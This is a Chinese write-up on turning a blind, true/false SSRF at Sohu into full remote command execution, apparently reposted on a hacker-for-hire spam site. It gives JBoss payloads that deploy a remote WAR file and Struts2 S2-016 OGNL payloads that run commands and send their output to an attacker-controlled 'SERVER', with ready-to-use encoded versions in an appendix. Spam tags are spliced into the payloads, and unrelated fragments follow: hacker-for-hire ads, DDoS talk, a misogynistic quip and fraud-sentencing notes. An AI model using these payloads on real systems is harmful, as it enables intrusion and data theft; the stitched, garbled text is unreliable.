*** 黑客速回先做事后支付-Bool型SSRF的思索与实践活动
什么叫Bool型SSRF, 真不知道. 实际上因为我沒有听闻过. 仅仅我不知道该怎么描述就起了那样一个名字. Bool型SSRF:简易而言便是仅返回True 或 False的SSRF. 就以我前几天我挖掘的一个搜狐网SSRF为例子, 仅有服务端恰当回应HTTP要求而且仅有回应码为200的情况下,返回Success,其他所有返回Failed. 这就是一个典型性的Bool型SSRF.
0x01 SSRF利用的基本思路
Wooyun上面有许多 SSRF典型性的案例, 可以说令人拍案惊奇. 可是没有一个有关BOOL型SSRF的利用案例(很有可能我没见到吧). 此次挖掘到一个搜狐网的Bool型SSRF, 针对我这个仅仅简易了解SSRF原理 *** 黑客科技园沒有一切实战演练的渣滓而言, 难度系数还好大. 但是想一想,之前沒有触碰过SSRF,此次就把你玩透. 阅览学习培训Wooyun上的案例, 掌握SSRF利用的基本思路:
内部网检测->运用鉴别->进攻Payload->Payload Result
内部网检测: 内部网服务器信息收集
运用鉴别: 服务器运用鉴别(能够根据Barner和运用指纹识别开展鉴别)
进攻Payload: 依据运用鉴别的运用,载入不一样的进攻Payload(最常见莫归属于Struts2)
Payload Result: 返回相对Payload的执行信息
0x02彼此之间的差别
BOOL型SSRF与一般的SSRF的差别在流程二运用鉴别,流程三进攻Payload和流程四Payload *** 黑客科技园 Result. 一般的SSRF在运用鉴别环节返回的信息内容相对性较多,例如Banner信息内容,HTTP Title信息,更有甚的会将全部HTTP的Reponse彻底返回. 而Bool型SSRF的却始终仅有True or False. 由于沒有一切Response信息,因此 针对进攻Payload的挑选也是有很多限定的, 不可以挑选必须和Response信息互动的Payload. 在本次搜狐网SSRF的中, 我各自应用了JBOSS远程控制启用和Struts2 S2-016远程连接命令实行. 针对Bool型SSRF, 大家不能说Payload打以往就一定成功实行, 就算是返回True, 也不可以确保Payload一定实行取得成功. 因此 我们要认证Payload的实行情况信息内容.
0x03 Bool型SSRF利用方式
1.运用鉴别
{指纹识别1 指纹识别2 黑指纹识别}, 这儿以JBOSS为例子:{ /jmx-console/ /invoker/JMXInvokerServlet /d2z341.d#211 }指纹识别1 和 指纹识别2 为运用鉴别指纹识别, 准确度越高越好. 黑指纹识别实际上便是不容易搭配一切运用的指纹识别,一般用很长的字符串数组替代就可以. 各自用指纹识别1, 指纹识别2 和 黑指纹识别对里网服务器检测统计分析, 获得三个服务器目录:jmx-console.host(A) invoker.host(B) black.host(C).
Host = (A∩B) –(A∩B∩C) 即去除jmx-console.host 和 invoker.host中存有于black.host的服务器, *** 黑客科技园 随后对jmx-console和invoker.host的服务器取相交.
2.进攻Payload
对于无需的运用大家必须载入不一样的Payload, 可是大部分的进攻全是必须和Payload Result开展互动的. 这种Payload是没有办法用在这里的, 大家必须的是不用和Payload Result开展互动的Payload. 我能想起的二种运用较为普遍的Payload有JBOSS和Struts2系统漏洞.
JBOSS Payload:
/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=3&arg0=http:%2 *** 黑客科技园F/192.168.1.2/zecmd.war
根据JBOSS HtmlAdaptor插口立即布署远程控制war包, 我们可以根据access.log去认证war包是不是取得成功布署.下边便是根据SSRF去实行不一样的指令.也有一种 *** ,便是我们可以根据大家 *** 服务器的access.log系统日志获得到虚拟服务器相匹配的公网IP, 有时候也会出现一些意外的惊喜.
Struts2 Payload:
/action?action:%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'command'})).start()}
Struts2系统漏洞的危害大家都懂的, 根据URL立即远程连接命令实行, 想打那边就打那边
3.Payload Result获得Payload Result是十分必须的,这儿的Payload Result和非Bool型SSRF的Result并不是一个含意. 针对Bool型SSRF, 服务端返回的数据信息始终仅有True和False, 我们都是能够根据返回的True或是False来分辨Payload的实行情况, 可是那样的分辨规范是没法令人相信的. 可否有一种方式可以精准的分辨Payload的实行情况,并且可以返回Payload Result. 针对Struts2我找到了一种可利用的方式。
0x04 Struts2在Bool型SSRF中的利用
下边是S2-016的POC:
/action?action:%{3*4}
/action?action?redirect:%{3*4}
根据对两个POC的了解, *** 黑客科技园 我们知道下边的POC中的redirect是完成URL自动跳转,根据URL自动跳转来认证S2-016系统漏洞.
自然还可以根据“?redirect:http://www.baidu.com”来认证. 那麼大家是不是能够根据”?redirect:http://SERVER/%{3*4}” 将%{3*4}的实行結果做为SERVER的URL的一部分发送至远侧 *** 服务器, 根据试验大家确认了那样的念头.
下边大家试着S2-016的指令实行POC,实行結果以下:
?redirect:%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'command'})).start()}
特此说明一下,这儿返回java.lang.ProcessImpl@xxxxxx表示命令实行取得成功, *** 黑客科技园 将指令实行的結果根据redirect自动跳转輸出到虚拟服务器.
?redirect:http//SERVER/%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'whoami'})).start()}
由服务端Access系统日志能够看得出,指令实行取得成功
实际上根据上边的这类 *** ,大家早已彻底可以精确的分辨Payload Result的实行情况, 可是不是我要的, 我要Payload Result实行結果. 带到显的POC:
?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'whoami'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt%3 *** 黑客科技园d#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}
将指令实行結果Redirect到远程控制:
我们可以见到当地电脑浏览器能够复印出結果,可是远程控制Access.log不容易有一切系统日志. 对Java懂一点点的人都了解(例如我,对Java略知一二一点点), 这儿的POC的功效便是当地复印,因此 肯定是不好的. 下一步大家就必须变更POC , 由于对Java不太熟, *** 黑客科技园 因此花销了半天的時间,写出下边的POC:
?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'command'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#t=#d.readLine(),#u="http://SERVER/result=".concat(#t),#http=new java.net.URL(#u).openConnection(),#http.setRequestMethod("GET"),#http.connect(),#http.getInputStream()}
SERVER是大家的HTTP *** 服务器IP地址, 大家获得指令实行結果,随后把他做为一个URL主要参数发送至远程控制SERVER上, 因此 我们可以在远程控制SERVER的access.log见到指令的实行結果.
虚拟服务器系统日志:
到此, 大家完成了从一个BOOL型的SSRF变换为一个一般的SSRF,我们可以获得到一切Payload的实行結果, 我只有说这是一个质的飞跃.
表明: 针对原文中电脑浏览器中实行的返回信息内容,大家只是是在做检测,针对BOOL型SSRF这种信息内容对我们都是不由此可见的, 大家能见到的只是是Server端access.log系统日志.
0x05 Other(想起哪些写什么)
Bool型SSRF的别的利用 *** -反射XSS也是一种可利用的构思,但是挖掘的难度系数相对性很大
此篇是对搜狐网SSRF系统漏洞利用全过程中的一些思索,实践活动和汇总.
这可以说就是我的SSRF处女座 洞, 和此文章关联的漏洞”搜狐某云服务API接口导致SSRF/手工盲打到Struts2命令执行”http://wooyun.org/bugs/wooyun-2015-0129588 , 因为抱着学习的态度, 漏洞报告写的非常详细,而且有很多技巧在文章中没有提及. 当然也有很多YY的想法, 想拍砖的就来拍砖吧.
附录
使用方式: 将SERVER替换为你的Web服务地址
POC-S2-016.SSRF版 黑客软件园 高亮:
?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
POC-S2-016命令回显集成SSRF版 黑客软件园 高亮:
redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23t%3d%23d.readLine(),%23matt%黑客软件园3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.setContentType(%27text/html%27),%23matt.getWriter().println(%23e),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
然后你又给黑客骗一次,再给国家缴纳智商税,黑客软件园2001年中美黑客大战背景简介2001年04月01日,美国一架海军EP-3侦察机在中国海南岛东南海域上空活动,中方两架军用飞机对其进行跟踪监视。北京。黑客速回先办事后付款
*** 专业黑客先做事后付款c是必须的c++、delphi等还要熟悉操作系统、比如漏洞什么的。
黑客速回先办事后付款就是带宽消耗,用带宽打你的服务器带宽,那边高那边就赢,这样说你应该理解吧!
某些男人可耻之处在于:想找个女人跟妈似的伺候自己,又不肯跟儿子似的听话;想找个姑娘跟女儿似的乖巧粘人,又做不到跟爹似的会疼人。所以,他注定。
2015年3月19日,在加拿大温哥华举行的Pwn2Own2015世界黑客大赛上,来自中国的安全研究团队360VulcanTeam仅用时17秒就率先攻破微软Win8.1系统和最新的IE。黑客速回先办黑客软件园事后付款
你讲的这个问题,只能推算。按照法律规定,涉嫌诈骗罪,数额巨大,应当判处三年以上十年以下有期徒刑。按照国家司法解释,数额巨大是三万元以上,不满50万元。
黑客速回先办事后付款。首先,比特币有一定的匿名性,便于黑客隐藏身份;其次它不受地域限制,可以全球范围收款;同时比特币还有“去中心化”的特点,可以让黑客通过程序自动。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
